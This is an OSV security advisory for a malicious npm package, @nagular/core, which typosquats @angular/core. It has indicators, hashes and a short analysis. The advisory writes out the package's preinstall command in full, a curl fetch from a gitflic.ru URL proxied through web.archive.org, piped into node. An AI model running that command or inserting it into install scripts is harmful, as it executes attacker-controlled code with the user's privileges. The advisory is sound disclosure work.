MAL-2026-17499

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@nagular/core/MAL-2026-17499.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17499
Published
2026-10-03T06:47:32Z
Modified
2026-10-05T23:00:06Z
Summary
Malicious code in @nagular/core (npm)
Details

@nagular/core@1.0.67 impersonates @angular/core (by name only; its code is an unrelated library described as "Core Libs") and adds a preinstall script that runs on npm install and pipes a remotely hosted loader into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. This runs attacker-controlled JavaScript with the installing user's privileges. The npm account angularr published @nagular/core and 5 similar packages on 2026-10-03 between 06:33 and 07:23 UTC, all with the same preinstall script.


-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5ac4933487fc7ccf7161933c9d5f6965b5e1f0a3efeaf8ea5349096835008557)

The package's package.json declares a preinstall lifecycle script that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching an unpinned, unverified JavaScript payload from an unrelated third-party host (gitflic.ru proxied through web.archive.org) and piping it directly to node for execution during npm install. The remote content runs with the installer's privileges before any package code is imported or reviewed, giving whoever controls that URL arbitrary code execution on every machine that installs the package. The remote path hellscripter/install-scripts and the use of an archive proxy are consistent with a hostile dropper rather than a legitimate build step. The scope name @nagular/core additionally resembles the Angular ecosystem (@angular), consistent with a typosquat lure, and the preinstall hook is the package's only functional content.

Database specific
{
    "iocs": {
        "files": [
            {
                "digests": {
                    "sha256": "cb787a229d1987746afb2dd58d1dc48a023c6e36ac7fc8b3b509ac732aa7fe15"
                },
                "note": "preinstall script pipes the web.archive.org copy of gitflic.ru hellscripter/install-scripts node.js into node (@nagular/core@1.0.67).",
                "paths": [
                    "package.json"
                ],
                "source": "PACKAGE_ARCHIVE"
            }
        ],
        "urls": [
            "https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js",
            "https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js"
        ]
    },
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-020918",
            "import_time": "2026-10-04T23:40:41.834205409Z",
            "modified_time": "2026-10-04T23:19:36Z",
            "sha256": "5ac4933487fc7ccf7161933c9d5f6965b5e1f0a3efeaf8ea5349096835008557",
            "source": "amazon-inspector",
            "versions": [
                "1.0.67"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / @nagular/core

Package

Name
@nagular/core
View open source insights on deps.dev
Purl
pkg:npm/%40nagular/core

Affected ranges

Affected versions

1.*
1.0.67

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "cb787a229d1987746afb2dd58d1dc48a023c6e36ac7fc8b3b509ac732aa7fe15",
            "tlsh": "01117b20dd8c5ea316c209f92cbdc8019565081b4d94fc5cf3ea040d8f5eaaf717a51d"
        }
    ],
    "package_integrity": [
        {
            "filename": "core-1.0.67.tgz",
            "hashes": {
                "sha1": "9f85f974963bed2c49a6a0c9437f9ce797f51572",
                "sha512_sri": "sha512-YqA8+/Zh1yq0ImHjK32MzmvRV79p1AeatvZBmuIcUvxsC2sOfcKYNB43yvj7XhpRnfJKexXcCiokH6c3lSd3kw=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@nagular/core/MAL-2026-17499.json"